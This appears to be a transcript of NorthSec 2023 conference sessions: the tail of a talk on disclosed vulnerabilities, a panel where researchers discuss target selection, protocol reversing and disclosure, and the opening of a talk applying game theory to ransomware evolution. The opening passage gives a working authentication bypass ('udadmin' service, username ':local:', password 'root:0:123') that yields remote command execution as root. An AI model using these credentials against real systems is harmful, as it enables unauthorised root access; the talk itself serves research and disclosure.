root:0:123 will always work, because root is basically always there and always UID 0. So here's a session. We connect to the udadmin service. We say, please connect with username ":local:". The password is "encrypted," but it's root:0:123. And then you say, please run the command id, and it returns uid=0(root). The nice thing about this, too, is you're root — it doesn't drop privileges. So basically, this is remote code execution as root. Here's some of the exploit code I wrote; this is the proof of concept that's in the Neptune repo. Yeah, you just pass the username ":local:" and the password root:0:123. There are also Metasploit exploit modules for this. So, just kind of wrapping up and summarizing the work we did: we ended up with nine CVEs for different things. Two of them we wrote full exploits for; the other seven we either crashed or demonstrated or whatever. Some stuff, like the memory exhaustion, is just a DoS; the weak encryption was kind of vague. But I thought it was a pretty good outcome, all in all. These are just screenshots of Metasploit — Metasploit has modules for the two vulnerabilities I mentioned. Yeah, and that is pretty much the end. I think I have one minute left. Perfect. I think we do a question session in 10 minutes. Other than that, there's the link to the slides. Feel free to use them. Feel free to reach out to me on Twitter, Mastodon, GitHub, whatever. And thank you for coming. Hello, everyone. Hello, everyone. Welcome to the Vulnerability Research Panel. We still have Dirk-jan and Ron with us here. So I'm going to start things off with a very important question: will your birds ever have a vulnerability logo? They don't have a vulnerability logo, but I can imagine them discovering a vulnerability. Actually, I was playing a computer game a few weeks ago called Valheim, and it turns out there's a hidden shortcut, Ctrl-F3, to hide the UI.
And I was holding Ctrl, and my bird jumped and landed on the F3 key, and I couldn't figure out where the UI went. I had to, like, Google it. So they're definitely little fuzzers. All right, let's go with a more serious question. Let's go with Dirk-jan: how do you choose a target or a system that you're interested in and would like to research? Oh, it's a good question. Usually — so, I get a lot of my ideas from actually doing real-world assessments. I look at a client environment, they explain to me, oh, we're using this and this, and I'm like, oh, I didn't know that was possible — like, how did you configure that? And then the gears start turning, and I'm like, oh, so this is how it works. So I start researching the protocols involved, I set it up myself, and you just figure out how it works, and whether there's anything I can do that defeats the assumptions they made. So I mostly look for logic bugs; I'm not really into binary exploitation — that's a different kind of skill set. So yeah, I usually look at real-world things that have not been researched that much yet, but are used by a lot of people — so, things that are relevant. That's also why I focus a lot on Microsoft vulnerabilities: like 90% of the enterprises in the world are using it, so it's very big, it's relevant, and that's usually how I progress in my things. And I have a very long mental to-do list of all the things I want to look at someday if I have time, so no shortage of research subjects for me yet. And Ron, do you use other meaningful ways of choosing targets, besides personal vendetta? Personal vendetta is about half of it. Yeah, at Rapid7 we don't have a ton of direction on what we're supposed to research, but our general approach is things that are meaningful to our customers and to the internet at large. So we're often looking for trends — like, what's been popular in the past year?
There was a vulnerability a couple months ago in a specific piece of software, and we take a reactive approach sometimes: we heard about the vulnerability, we researched it, we built a POC, and we released details. And I thought, this is an interesting class of software — I don't wanna say specifically what it is right now, but it was an interesting class of software, and I wondered if there are other things that do the same thing. It was network perimeter stuff, so it was something that points to the internet and was semi-popular as a class of software. I thought, I'm gonna dig into this and see what other software exists. So I picked out three, I installed them all, and I found one that felt worse than the other ones. So I chose it and found some vulnerabilities that I've now reported. Usually, if you do this often enough, you get like a spidey sense: you look at a piece of software and it's like, this is probably gonna end up vulnerable. There aren't always tell-tale signs, but it's been like that with a lot of products — you look at it for five minutes, you decompile a bit of the code, and you're like, ah, this is gonna be fun. Or it's like, well, this looks quite all right; maybe I can find something, but it's not gonna be a golden thing, so I'll put it on the backlog a little bit. We'll take a moment to talk about time-framing a little later. But you mentioned that you do have a backlog of stuff that you would like to dive into. Without spoiling anything, but maybe giving hints about what looks interesting for people that would like to research some stuff: do you have things in your backlog that you might never get to, but you know will be interesting, that you could point people at? So the things that I already know are interesting usually go to the top of my list. I mean, in general, with Azure AD research and with cloud research in general, I felt like the past few years I was one of the only ones doing it.
Nowadays, luckily, more people are looking at it, but a lot of things are still not looked at as much by the pentest community, the research community. There's still a lot of focus on on-prem AD, while everyone is migrating to the cloud, has already migrated to the cloud, or is working with these hybrid setups. And I think there are still a lot of things to look at there. No specific topics in particular, but if you look at what is implemented attack-wise, tools-wise, then just go build on that. And I'm sure there are a lot of things still out there — with vulnerabilities, with holes, with flaws, things you could explain better, because there aren't many blogs about it yet. So I think there's quite a lot left to do in that area. Any extra input? I feel like I take the opposite approach, where I don't really have a backlog. I finish a project and then go, oh crap, what do I do next? And I kind of look at Shodan and look at other sources. I look at what was interesting — we keep a list of the top vulnerabilities of the year, and I look back at those and try to get inspiration. But really, I have trouble coming up with the next project every time. All right, you just spoke about Shodan. Do you use some special tools, or are there particular tools that you really enjoy finding a use case for? You're building on whatever research you're doing, and you have the opportunity to do something, and you're just impressed by this tool that does something really nice — are there some little secrets there? I don't really have an answer for that. For tools, I tend to be really bad at learning new tools, so I tend to stick with things I learned 10, 15 years ago. So I wind up using, like, old versions of WinDbg and GDB with no plugins and stuff like that. And I feel like — I use Vim as my editor and I have a million plugins, a million configs, but I'm hacky. I'm just using, like, a monochrome GDB terminal.
I really feel like I should learn tools that aren't just the basic crap. Like I said, I'm not really a binary researcher. Sometimes, if I look at Windows internals, I have to look at things like LSASS. If it's .NET, at least there are some tools — decompilers that I really appreciate, that can decompile things into sort of human-readable code. Otherwise I have to use Ghidra, or I use x64dbg — they're quite essential if you really start looking at the Windows internals part: how LSASS handles data, TPM stuff. So those tools in general; for the rest, I prefer to just use the web things, like Burp as a proxy. That's all I do with Burp — I just use it as a glorified proxy. But it's a very useful tool to have, yeah. I know you've developed a lot of tools yourself. Is it for the learning curve, or is it really that you want your own spin on stuff that exists, or is it just a technology preference for building them in Python? I always want to understand how things work, and I think the only way to know how things work is to implement them yourself — not for everything, but for most things. The one time I just took someone else's code, when I wrote something, I used their code and didn't look at it too much, and there were some vulnerabilities in there, and I was like, well, from now on I'll just write my own code, thanks. But basically, if you use other people's code without knowing the journey they went through in order to write it, then I don't think you get to those branches where you're like, OK, so at this step it does this, but what if I change something here and do something different — what will that do? And with most of my research, like the whole Windows Hello flow as well, it's just separate steps.
Of course, Windows does them all at once, but if you implement them in a library, then you can do all the steps in a different order, with different parameters, some basic fuzzing. If you pull it apart, then you can really analyze it. And if you want to do these things, then you will need your own tools, because if I have to modify Windows memory in order to inject new certificates, that's gonna be really inefficient. So usually I write my own tools for every research project that I do, and that brings me to understanding the implementation and finding flaws in it. I also like to have tools that make my life easier: a lot of my research is done with my own tools that I built to automate sign-in with Selenium, so I don't have to enter the codes all the time or copy-paste passwords — it just does all that for me. So it's also about making my own life easier. You know, I have a similar process — kind of a two-fold answer to that one. Sometimes I find it really hard to read academic papers and to understand big concepts, but if I write them myself or implement them, I can usually get my head around them eventually. So I wrote a tool many years ago for padding oracle attacks, for example, and an even better one for hash length extensions — a tool called Hash Extender. I ran into this in a CTF and I was like, there are no good tools for this and I don't understand how it works; I wonder if I can figure this out. So, with a mixture of reading white papers and trying code, eventually I got the concept, and then I was able to write my own tool that others use now, which I'm kind of proud of. The other part is, one of my favorite things to work on is network protocols. And typically, besides, like, netcat, there are no good tools for testing protocols, because I'm just building it as I go.
So I'll figure out the header is 20 bytes, and then if this looks like a length field, what if I send the wrong length? Or this looks like a version, what if I send the wrong version? Or this looks like an opcode; what if I send every opcode from zero to 255? And as I figure out what things mean, I'll just build functions and build tools, and at the end I have a library of sorts for this protocol, and then I'll try to clean it up and merge it into Metasploit, and then we'll have protocol support in Metasploit for it. So I find it useful as a reverse engineering thing as well. Speaking of protocol reversing, we have a question from the public here, asking if you have any particular tools or special tricks, I'm guessing, when you're looking at reversing some opaque protocols that you don't know anything about. I know in your talk you talked about re-implementing a client, which often helps a lot, and we saw you use GDB, IDA, and Wireshark, I'm guessing. Anything else in your toolbox? I think that's largely it, and Ruby, like writing code for it. My favorite thing to do is to use a packet capture tool, capture a conversation, and try to identify things. When you look at network protocols, similar things usually happen. There's usually a length field near the beginning or at the beginning of each packet, and you want to find the length field because TCP is a stream and you need to be able to chop it up. There's usually a version number of some sort, and usually the version number doesn't change, or if it does change, it's going to be interesting because you can use old versions. Usually there's stuff like that. Then usually there's a list of values. The most typical thing I see is type-length-value, where there's a type, like string, a length, like 10 bytes, and a value, like 10 characters. So I'm looking for stuff like that, and almost every protocol ultimately comes down to that.
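The type-length-value pattern described above can be sketched as a minimal parser. This assumes a hypothetical record layout of 1-byte type, 2-byte big-endian length, then the value; real protocols vary in field widths and byte order:

```python
import struct

def parse_tlv(buf: bytes):
    """Split a byte stream into (type, value) records.
    Assumed layout: type (1 byte) | length (2 bytes, big-endian) | value."""
    records = []
    off = 0
    while off + 3 <= len(buf):
        rtype = buf[off]
        (length,) = struct.unpack_from(">H", buf, off + 1)
        value = buf[off + 3 : off + 3 + length]
        if len(value) < length:
            break  # truncated record: TCP is a stream, wait for more bytes
        records.append((rtype, value))
        off += 3 + length
    return records

# Two records: type 0x01 carrying "hi", type 0x02 carrying "ok!"
stream = b"\x01\x00\x02hi\x02\x00\x03ok!"
print(parse_tlv(stream))  # [(1, b'hi'), (2, b'ok!')]
```

Once a parser like this exists, fuzzing "what if I send the wrong length" is just building the records back with deliberately bad fields.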
Sometimes it's more complex and sometimes it's less complex, but that's usually what I'm looking for. I guess I should mention one other thing. There have been several projects I've worked on where I'm looking at a client app. Like, I install this service on Windows and I double-click an .exe file and it gives me a UI for it. If you packet capture that and listen on localhost, sometimes those still communicate over TCP. The current thing I'm working on, which is not public yet, I did that: I ran it, I packet captured the local client, and then I used that same protocol remotely. And what's funny is sometimes the local client, this goes back a couple of projects ago, but sometimes the local client will say, like, I am a local client, here's a field that says I am authenticated, and the remote users don't set that field, but if you set that field, it actually works. There was a tool called Flex License Manager or something that was used by Citrix, and there was exactly such a vulnerability reported on it, which I'm not sure ever actually got fixed, but it's on the Rapid7 blog, where the local client would say is-local true and the foreign client would say is-local false, but you can just say is-local true and bypass the auth checks. So, like, that works sometimes. Yeah, I sometimes have a bit of a chicken-and-egg problem, because in this research a lot of it is about analyzing how Windows joins itself, but that's all happening when you install the operating system. So obviously at the Windows installation screen there are no tools yet, there's nothing, and most of it is web traffic. So if you can get it through a proxy, it's quite easy to analyze.
So you tell Windows, at the very first moment you boot it up after installation, to use the proxy and put everything through that. And then when you have Azure AD-joined, managed systems, there's an MDM involved which uses client certificates, so you need to intercept the registration and then intercept the client certificate, and then you can decrypt the traffic, because otherwise things will break. So eventually I figured out that instead of trying to do everything manually and import these certificates during the installation, I could just use the device management solution to push my certificate and to push myself as a proxy, and then it happens automatically. So then you won't catch the very beginning, but at least from the moment Windows contacts the MDM, it will put in the right settings, and after that everything goes through automatically. So, use the tools that you have as well. So you're both professional security vulnerability researchers. We have some questions about your workflows. I'm guessing some people want to learn or understand: how do you manage your time? Are you a very freeform person, or do you time-box a lot? Do you assign specific time lengths or periods for specific parts of your research? Can you elaborate a little on how you organize your time? Yeah, for me, I would say I'm on the disorganized side. I usually have some idea of the project I'm working on and the outcomes I'm looking for. The first thing I usually do is look for attack surface and sort of mentally break down all the things I want to look at. Are there network services, TCP, UDP services? Are there Windows services? Are there startup files? Configuration files? Is there encryption? Is there web? Is there whatever? And I try to get an idea of all the things I want to look at, with experience and intuition telling me how long it's going to take.
Probably this will take a couple of weeks, maybe a month, kind of thing. And then once I start working on it, as long as I'm making steady progress and I'm not just hung up on something, I feel like I can go for a long time, and eventually, again, it's kind of intuitive, knowing when I've explored the major attack surface I want to look at or when I feel like I'm not going to find anything. And after a while, it's hard. Like, the current project I'm working on has like eight different protocols to look at, and I worked on one for about two months and got some nice findings and sent them to the vendor. Now I'm like, do I really want to work on the other seven, or do I call this good? Because I feel like I have a lot of context on the project now. I know how to install it, I know how the code is kind of laid out, the C++ and the classes it uses and stuff. I want to continue on it, but I also feel like I could do better work elsewhere. So I think once I get back from Montreal I'm going to have to answer that question, because I'm pretty freeform in that sense. Yeah, so I'm not a very organized person. That also goes into my research. Sometimes I just look at something for a day or two and then abandon it in order to get back to it later. Usually when I research a certain topic, once I have the feeling that I found what I could find and I have a rough understanding of the things that are at play there, then that's enough. That's usually also the point where I send the reports over to Microsoft. And it always takes a while to fix these things, so there's a waiting period where I have to wait for them to fix it and see how they fixed it. And then I can release my tools, and then I figure out there are a few more things here that I assumed and don't know fully yet. And then when I make my slides, when I write a blog, I look at it again and sometimes find some more things, or find some alternative ways, or research some more parts.
Like for this talk also, I had a feeling of what was possible, but the NT hash extraction I actually only got working yesterday. So I knew it was possible, I had seen it in the past, but I didn't remember the exact implementation, and then I got it working, got a screenshot, put it in the slides, and then it was done, but it could be made a little bit better. So I also need to brush up those tools a little bit before I push them to GitHub. So it's not always very organized. It doesn't help that, well, obviously you want to report these things and make sure they get fixed, so you cannot just write it, push it, and then blog it in one week. But yeah, I do have a lot of concept things that I have locally, that I have working. Some things work, they can do things, but they're so vague that I don't even understand why they work, so that needs some more research as well. But yeah, it's always challenging to find the focus, to deeply focus on a project and then finish it, wrap it up, write it all down, make screenshots, make it understandable for people that haven't dedicated that much time to it. But well, it works. I've also got a problem that I call the 'one last thing' problem, where the last thing I do always takes half my time. Like, I did a project a few months ago on F5 BIG-IP, and I found some vulnerabilities. I reported them to the vendor, they confirmed everything, and I went to write the blog and I was like, you know, I never did run Burp Suite against one endpoint, and I crashed the server, and I was like, oh crap, now I gotta do a second round of this. And the current project was the same thing: I got to the end, I got some okay findings, nothing exciting, and I thought, what if I just do a quick crappy fuzzer and just flip bits in the packet? And I crashed it. Oh no. The last thing is often the biggest thing, and I did that when I was a pen tester too.
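A "quick crappy fuzzer" of the kind described above can be as small as a bit-flipping mutator. A hedged sketch; the function and parameter names are made up, and actually sending the mutants to a target is left out:

```python
import random

def flip_bits(packet: bytes, n_flips=1, seed=None) -> bytes:
    """Return a copy of packet with n_flips randomly chosen bits flipped."""
    rng = random.Random(seed)
    buf = bytearray(packet)
    for _ in range(n_flips):
        i = rng.randrange(len(buf))       # pick a byte at random
        buf[i] ^= 1 << rng.randrange(8)   # flip one of its eight bits
    return bytes(buf)

# Generate mutated copies of a captured packet to replay against a
# test target (the capture bytes here are illustrative).
captured = b"\x00\x14MYPROTO\x01login"
mutants = [flip_bits(captured, n_flips=2, seed=s) for s in range(5)]
assert all(len(m) == len(captured) for m in mutants)
```

Fixing the seed makes each mutant reproducible, which matters when one of them crashes the server and you need to replay exactly that packet.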
I'd be writing the report and be like, hey, wait, what about...? And then it just becomes an avalanche. Are you very individual researchers, or do you exchange a lot? When you find something you aren't sure about, some stuff on the table that would need more research, do you rely on friends and contacts at that point, or do you push on by yourself? Usually, I'm doing things in the context of work, and I have one coworker who's in Ireland while I'm on the west coast of the US, so we're nine hours apart and we don't really work together all that much. And I like to work with other people at my company, but realistically my team is very, very small, so I don't get to do it much. Before we have findings and before we have 0-days, I occasionally tag in friends. I was working on a weird compression issue a couple of weeks ago. I have a friend who's a big crypto and compression nerd, so I reached out to him and said, hey, I have a weird problem, can you help me make a file that compresses to itself? And he said sure, and we built it, and that ended up being a finding. So I'll reach out to friends sometimes, but realistically I can't do it much, just because I'm doing everything for work. Yeah, so I don't collaborate with other researchers that often. Of course we all learn from each other's work and get inspired by each other's research. There are a lot of people doing research; I'll read about it and build forward on it. I do have some projects that I do together with others, like working on a project with Olaf right now as well, on some Azure AD research. It comes with new challenges: if I just have my labs on my own machine, it's very easy; if you need to share a lab environment with virtual machines, then you get into all new kinds of issues, like where are you gonna host it, how are you gonna make sure you both can access it, how are you gonna keep notes you can share with each other.
How do I get the better version of my tool, the one that contains all this undocumented stuff, over to them? But yeah, of course it's great to collaborate and get some different perspectives. Usually I do things on my own, though. We have some questions from the public asking about disclosure, vendors, and funny stories. Any worthwhile anecdotes there? Disclosure is sort of an interesting issue, because every researcher and every company has their own policies. Our typical one at Rapid7: a guy named Tod Beardsley worked for us until fairly recently, now he works for the government, CISA or something. But he helped draft a disclosure policy with my manager and with me that said, when we send a vendor a report, here's our typical policy, with a bunch of asterisks: we'll publish in 60 days unless we agree on something mutually better. And usually we'll push it out to 90 days or a little bit more if the vendor requests it and they're being communicative. But we've had interesting issues in the past. There was one vendor we reported a vulnerability to, and it turns out they were a customer, which doesn't affect us at all, but we've got to be nice to customers. And they asked if they could chat with us, the researchers, and we don't typically do that, but we were like, sure, whatever. And they were really interested in how we got the software, and I'm like, so I find these cool vulnerabilities and I have a lot of interesting advice for how to make the software more secure, and he's like, so how'd you download it? And it felt like kind of a waste of time. And they ended up actually fixing things without an extension, so it ended up being okay. I feel like I have other stories I can't remember right now, but maybe I'll think of them. Yeah, so I'm almost exclusively disclosing to Microsoft. I would describe that usually as a bit of a roller coaster.
Every time there's some new wrinkle; I think I've seen it all by now, but then there are always new things. I've actually had a case that I assumed was fixed; then I talked about it at a Microsoft conference, no less, and it turns out it was not fixed. So I accidentally dropped a zero-day on a Microsoft stage. One for the bucket list. I've also had one that I talked about last year. I assumed it was fixed and didn't look at it. I had a talk again a couple of months later, then found a really trivial bypass, and apparently no one else had bothered to test whether the things I say are actually true and whether it was actually fixed or not. So maybe there's some interesting stuff in there. But then they very quickly fixed that specific bypass, like within a day, so I could give my talk the next day. That was a good collaborative experience. Other than that, yeah, I've had one non-Microsoft case where the only way to report the vulnerability was that they basically required you to do it via HackerOne. Their terms were basically: you don't get anything, but you're not allowed to disclose it. So I was like, give me some alternative way if you want my bug, which they eventually did. But yeah, it's a bit of a wild west out there sometimes, but at least Microsoft has a good reporting process, and I get to talk to them nowadays and get some collaboration on how they fix it and when they fix it, and that usually works out all right. So we have five minutes left, so I'm gonna switch subjects and move on to: how do you break into a career in vulnerability research? What's your first step if you wanna do that? So I have an old friend, Jeff McJunkin, who talks about this a lot. He's a SANS instructor, among other things. And something of his I always like repeating is that security, especially research, is like a prestige class. If you play D&D, you'll know prestige classes are what you can get to after you max out your normal class.
And I think it's really true: if you are really good at something, whether it's networking, Windows, protocols, development, whatever, once you get good enough, security stuff is a lot easier to get into, because security is often looking at how things work and how they connect and where that breaks down, where the assumptions made while developing it break down. And it's a lot easier to understand the assumptions if you're a programmer trying to find assumptions someone made in their code, or if you're DevOps and you're looking for assumptions people made in their deployment pipelines or whatever. You're a lot more qualified to understand it once you've gotten really good at the thing it's based on. So as a result, I think the reason I got where I am is because I was a programmer. I did a computer science degree and was a developer for a while, and I found security really interesting, and I would develop a lot of tools and release things open source. And it seems like there's a lack of that in infosec sometimes: people use tools but don't necessarily write tools. And I found that writing tools and explaining research in, I don't want to say a basic way, but in a way that's easily approachable, is really useful. Reading white papers is tough for me and for a lot of us, but if someone takes a white paper and writes a blog in a more casual way with examples, sometimes that can be a really great way to learn, and people really appreciate that. So I feel like writing tools and explaining the tools is kind of how I got where I am. Yeah, I think it mostly takes a lot of investment, mostly time-wise. And then maybe natural curiosity is what helped me. I just want to know how things work.
But if you want to get started in security research, I mean, the easiest way, I think, is just to try to understand the things that you're doing. Like Ron already mentioned, don't just blindly run the tools; try to read the source code, try to understand it, try to find some topics that maybe don't have a lot of tools, or that don't have a lot of resources like blogs that explain how the process works. And if you want to start low-key, then just write a blog explaining how a certain process works; make sure you understand it for yourself. You don't need to find all kinds of zero-days the first time in order to write a blog that's useful for others. If you start on your journey and you run into some things, it's quite likely others will run into them as well. So if you want to start low-key, just start understanding it, start sharing that. And then once you understand the topic enough, you'll find parts where no one else has gone yet that you can research. And then I think the vulnerabilities will come by themselves, but at that point you've probably invested a lot of time in it already. It's also really challenging sometimes, because for a lot of people, especially in consultancy, you do your assessments, you have to write the report, and then the next week it's the next one. So if you want to really learn how things work beyond that, either your employer has to give you space or you have to do it in your free time. If you want to do other things in your free time, I completely understand that as well, but then I don't think you will get to the research level if you don't have any time to invest in it. It's just an investment, and not everyone has that. Not everyone prioritizes that, and that's fine as well, but yeah, there are different ways of doing things, I think, and getting there. I think we're pretty much done. So thank you very much for spending some time with us. I hope everybody liked that. Thank you.
Have a great lunch. You're welcome. So I think our two guests mentioned that they will be around for the rest of the conference, and we should also maybe cross them at the CTF. So if you have some other extra questions, you can chase them. Welcome everyone, good afternoon. We're at NorthSec 2023, and we will have a great afternoon. All right, so welcome back to day two. We are continuing with the criminology block, mostly from the University of Montreal, to be precise. Also from the University of Montreal, our moderator, Masarah Paquet-Clouston, is a professor at the University of Montreal and a collaborator at the Stratosphere Laboratory. She holds a PhD in criminology from Simon Fraser University and is specialized in the study of profit-driven crime enabled by technologies. In the past, she worked five years as a researcher in the private industry, and she is now a NorthSec veteran and international speaker. So please welcome Masarah. Thank you so much, and thank you for being here just right after lunch. It's really nice. We have three great presentations coming up. We'll first start with Vicky Desjardins. She's an English lit major turned criminologist, turned cyber threat intelligence analyst. She's eternally optimistic that research can make the world a better place. She turns crazy ideas into research projects and figures out later if they're actually possible. So welcome Vicky, and thank you for your presentation. Thank you. So hi, thank you all for coming after lunch on the second day. I'm very happy to have you today, so thank you for coming to my presentation: Checkmate, using game theory to study the evolution of ransomware. This is gonna be a presentation of the preliminary results from my doctoral research. Perfect, so who am I?
Well, I mean, Masarah described me pretty well. I'm a full-time PhD candidate, but I also work at Hitachi Systems Security full-time as a CTI analyst. I enjoy reading a lot, boxing way too much, and growing potatoes on my balcony. And above all, I'm also a crazy cat mom; this is my little one. His name is Mr. Darcy, and he's pure evil. Don't get fooled by that face. So let's go over the presentation plan really quickly. I'm gonna introduce game theory in really simple terms, because otherwise I could spend three hours just on this. I'm gonna discuss the reality of the cyber battle against ransomware, because this was something that I didn't anticipate until I started in the industry, and it really impacted my research. Then I'll present the research methodology and the sample. Because this is only a 30-minute talk, I'm only gonna present certain results and analyses. I'll discuss the limits, because no research is perfect, and then I'll conclude with some of the future steps that this research will take. So what is game theory? Game theory analyzes the interaction between self-interested groups who behave strategically to maximize the probability of reaching their end game. If we wanted to use this definition in terms of cybersecurity, what we could say is that we study the interaction between attackers and defenders in a way to predict the outcome of that interaction. However, for this research, I'm not using game theory to predict behavior. I was warned by my director and my supervisor that if I did, I'd automatically fail my thesis, and if you've done a thesis, you don't wanna fail for something so stupid. So let's get back on topic here. Game theory is an economics theory, which is often used in warfare or in conflict management, right? You've probably heard of it on TV shows, but it usually gets very simplified and dumbed down.
The only show that I saw that did it pretty well was Prison Break season five, and even that was pretty simplified. I picked this theory because I thought it was cool, and now I'm regretting it every step of the way, but we're three years in and we're going with it, right? So what game theory brings is that you can look at how people behave, how they play together, and how they're gonna pick their strategies based on this interaction. One way of doing this is to look at what the person wants, what's the end game they wanna take away from this, right? The reason they're in this game. If we wanna simplify this in cybersecurity, we can say that attackers wanna make their attacks successful, whereas defenders wanna block all these attacks. So their behaviors, their choice of strategies, are gonna be according to their end game. The only problem is that they can't both be winners, and they can't both be losers, right? So this is why we're in a situation of a zero-sum game, which is defined as: the win of one causes the direct loss of the other. So in cybersecurity, for an attacker to win, the defender must have lost. You can't have half wins, right? You didn't just half-ass it, whoops, I don't know if I'm allowed to say that, but whatever. You didn't halfway do it; you were successful. So I've talked a lot about definitions and you're probably thinking, I really don't care about Econ 101, I skipped it for pints. So let's just bring it back to the main subject. In ransomware, the end game of the attack will be to launch that successful attack, and I'm gonna stick to the technical side. I'm not gonna focus on the extortion side today, because 30 minutes. So let's just say that for a ransomware attack to be successful, technically speaking, the threat actors need to be able to encrypt, corrupt, or steal the data. If not, the attack is not successful. So this is why we're in a zero-sum game.
The win of one causes the direct loss of the other. So there are two types of games that I'm gonna talk about today: static and dynamic games. A static game is when the players are both acting at the same time, and so you have limited ways to prioritize strategies, right? You can think of rock, paper, scissors. Technically there are only three strategies, but unless you've played with the person multiple times, you're limited in predicting what the person is gonna choose as a strategy. And again, there are only three. I feel like most people start with rock first, that's just the easy one. So if you're thinking about this, you're like, okay, I should prioritize paper, because then I'll win. But then everyone's thinking the same way, so then scissors technically becomes the main strategy that would lead you to win. But if you haven't played with this person before, you're still kind of guessing, and you have a one-third chance of being right. Dynamic games are different, because it's more of a sequence, one move after the other. You can think of a game of chess as being dynamic, right? So in a dynamic setting, you have more time to plan and more time to prioritize certain strategies over others, and you see what the other player is playing. Now, you take for granted that you both know the end game of the other, because we're playing chess; we're gonna stick to the chess example for now. But there are two ways you can go about this: you can try to win, or you can try to make them lose, which in game theory are two different things, right? Depending on the type of setting you're in. So if player one does not want player two to win, player one can choose strategies that would block the other player, or choose strategies that will make themselves win.
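The rock-paper-scissors example can be written down as a payoff matrix. The sketch below is purely illustrative: it checks the zero-sum property the speaker describes and the one-third chance of being right against an unknown opponent:

```python
from fractions import Fraction

# Row player's payoff: 1 = win, -1 = loss, 0 = tie.
# Index order: 0 = rock, 1 = paper, 2 = scissors.
PAYOFF = [
    [0, -1,  1],   # rock vs rock / paper / scissors
    [1,  0, -1],   # paper
    [-1, 1,  0],   # scissors
]

# Zero-sum in this symmetric game: my payoff for playing i against j
# is the negation of my opponent's, which is the (j, i) entry.
assert all(PAYOFF[i][j] == -PAYOFF[j][i] for i in range(3) for j in range(3))

# Against an opponent picking uniformly at random, every pure strategy
# wins exactly one game in three and has expected payoff zero.
third = Fraction(1, 3)
for row in PAYOFF:
    assert sum(third * v for v in row) == 0
    assert sum(1 for v in row if v == 1) == 1  # one winning outcome in three
```

This is also why "prioritize paper, but everyone thinks that, so play scissors" goes in circles: the game's only equilibrium is the uniform mixed strategy.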
So in a sequence, in a dynamic setting, you have a lot more opportunities to learn from your opponent and dictate how you wanna either push them into a corner or get yourself ahead of the game. See, when I first started this research, I thought cybersecurity was a clean-cut dynamic setting, and well, I was wrong. So let's figure out why I was wrong. So, the reality of the cyber battle. I started this research over three years ago now, and when I did, I wasn't working in the industry. I wasn't at Hitachi yet, and I got hit with a brick when I started working in the industry, because the reality was so not the pink bubble that academia can be in research, right? I got thrown into a war zone of, like, there are attacks everywhere, there's one defense team, and the rules of engagement are just not there. So this became very complicated when you're trying to study it from a game perspective. One of the main conclusions I drew was: it's not one game at once, and it's also not one team against the other. It's more a bunch of different attacker teams versus one team of defenders. So if we're gonna take a sports metaphor, it's kind of like if the Habs were playing against Toronto, Ottawa, Vegas, and Washington all at once on the same ice. Now, none of these teams represent the same level of threat, but you still kind of have to deal with them all, and yes, if you know, you know. That's all I'll say. So here's the problem with game theory in this research: it's very difficult to reconcile the fact that you're supposed to be one player against one player, and one player can be a team of players, by the way, just in case I didn't mention it. And the other problem is that the weight of winning is no longer the same, because the teams aren't the same. For a threat actor group to win, they need to hit one place at the right time with the right tool or the right exploit or whatever.
It's a little bit more complicated than that, but we'll simplify it for now. The problem is, on the defenders' side, they must protect everything, everywhere, at all times, and that's just not the same weight. For those who work on the blue team or defenders' side, you know that you always get surprised by things you didn't know were connected on your attack surface, like that random printer that's still admin/admin from 10 years ago, that they didn't put on the sheet and you didn't know existed until it was too late. I see some of you laughing because you know it happens, right? So now we're in a situation where defenders are just set to lose at all times, and I didn't really like that, so I decided to try to do something about it, which was kind of my downfall, but we'll talk about that. So, story time, quick story. In my family we play this game called Pay Me, okay? We play at every event for hours on end, and it's a dynamic-setting card game. You either need to do series or identicals, right? But because I've played with the same family members over and over again, I kind of know what they do and their choices of strategies. For example, my grandma, who's like the sweetest person ever, counts cards; I just know it, she does it. My brother loves risk, so he goes big at all times, just going all in. He hasn't won a game in like 10 years, but he still aims for that strategy. I do not like risk, I'm not someone who likes risk, so I play it easy and just cheat. Or maybe I do, maybe I don't; I probably do. So my point is, because I've played with them for years, I know how they behave and I know their strategies, right? So how about applying this logic to cybersecurity and learning the attackers' playbook? If you wanna block attackers, you need to know how they might behave, right?
But then in cybersecurity research that applies game theory, one of the main downfalls is that people say there are too many strategies, the number of strategies is infinite, and we can't do it. Well, yeah, okay, technically speaking, theoretically speaking, sure. But no, because we're all humans, right? There might be an endless amount of possibilities, but humans don't know all of them. So you're already kind of hinting at something, right? Humans are rational; well, some of them are rational, not all of them. So I wanted to start looking at that playbook, but from an evolutionary perspective. And instead of focusing on everything that changed, I wanted to look at what didn't. The reason I wanted to do this: before I started this research, I was reading an article that said that there are 20,000 new ransomware samples per quarter, right? And I'm pretty sure it was actually monthly, but let's just be conservative and say it was quarterly. And I remember thinking back then, when I didn't really know anything about ransomware, well, compared to today I knew nothing about it, but I was like, there is no way in hell that there are 20,000 new strains created from scratch, right? It just didn't really make sense. And when I started doing the data collection, I realized I was onto something, but back then I didn't know. So what I wanted to do was look at what hasn't changed and focus on this, because the idea was: if it hasn't changed over the number of years I was gonna study, then why would it change now? Why would it change next? And this is, again, not a prediction; it's more of a common-sense argument, right? And then I wanted to know, well, if we can figure out what hasn't changed, can we prioritize countermeasures for these weak spots? Because then it might give us a chance to equalize the weights of winning and losing. This was the idea. So this is the presentation of my doctoral studies.
So the question was: how can game theory be applied to study the evolution of ransomware? And like I said, the research aim was to identify what hasn't changed in the techniques. The end game of this project is to create an interactive kill chain... well, not a kill chain, I'm not allowed to say that. An interactive kill tree using commonly used defense evasion techniques, which I'm not going to have time to talk about today. Today I'm going to focus mostly on discovery and defense evasion, because honestly that's what interests me the most. So, the methodology. I gathered over 400 white papers. The reason I used white papers to create this database is that I'm a criminologist, so my malware analysis skills are non-existent. I had to rely on the white papers. What I did was take those white papers, apply the MITRE ATT&CK framework to them, and try to see if I could study evolution this way. Now, between you and me, this was the wrong call and I probably shouldn't have used the MITRE framework, but it was a well-established model that I knew was going to be accepted for my thesis. I'll explain later, in the limits, why that was probably not the right call. From those white papers I collected not only the MITRE IDs; I also collected the type of encryption they were using, their AKAs (also-known-as names), their known associates, and any particularities they had. I'm not going to have time to talk about all of this today, but honestly, I kind of vacuumed it up, grabbed as much as I could, and then played around with the data. I ended up with a sample of 116 strains: 51 were cryptoware, 65 were leakware. And for future testing I also subdivided them into ransomware-as-a-service versus owned. The sample is from 2016 to 2020... well, I'm going to say 2022, because I only have one for 2023.
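The coding exercise described here, tagging each strain's white paper with MITRE technique IDs plus a few extra fields, could be sketched like this. The strain names and entries are made up for illustration; the technique IDs are real ATT&CK IDs, but the tagging is hypothetical, not the thesis's actual data.

```python
# A minimal sketch of the white-paper coding described in the talk:
# one record per ransomware strain, tagged with MITRE ATT&CK technique IDs
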